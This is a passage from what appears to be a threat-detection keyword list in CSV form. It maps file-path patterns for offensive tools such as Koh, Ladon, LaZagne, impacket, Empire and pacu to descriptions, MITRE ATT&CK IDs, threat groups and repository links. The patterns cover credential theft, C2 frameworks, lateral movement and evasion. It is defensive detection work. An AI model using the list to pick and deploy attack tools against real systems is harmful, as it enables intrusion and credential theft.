with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/Koh/*.cs*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,1,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*/KrakenMask.git*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,1,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -*/krb5/*.py,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/krb5-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/krbjack.git*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,1,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*/KrbRelay*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*/krbrelayx*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*/KRBUACBypass*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,1,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*/kronos.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/kubesploit.git*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*/L0ading-x/cve-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/L0ading-x/cve-2022-23131,1,1,N/A,N/A,1,23,11,2022-02-22T01:45:34Z,2022-02-22T01:39:52Z -*/laconicwolf/burp-extensions*,offensive_tool_keyword,burpsuite,A collection of scripts to extend Burp Suite,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*/Ladon.go*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/Ladon.ps1*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/Ladon.py*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/Ladon/Ladon.*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/Ladon/obj/x86*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/LadonGo/*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/lambda__backdoor_new_roles*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/lambda__backdoor_new_sec_groups*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/lambda__backdoor_new_users*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - 
TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/LambdaLooter.py*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,1,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*/lanattacks/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/lansearch.exe*,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*/laps.py *--ldapserver*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,0,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*/laps.py *-u * -p *,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,0,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*/laps_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/LAPSDumper.git*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,1,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*/lastpass.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential 
Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/Lateral/SMB.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/lateral_movement/*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/lateral_movement/*.ps1,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/laZagne.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*/LaZagne/Windows/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/ldap.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/ldap_injection.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/ldap_search_bof.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/ldap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ldap-novell-getpass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/LdapRelayScan.git*,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,1,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*/ldap-rootdse.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ldap-search.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ldapsearch-ad.git*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,1,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -*/LDAPWordlistHarvester.git*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,1,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*/ldeep/*,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 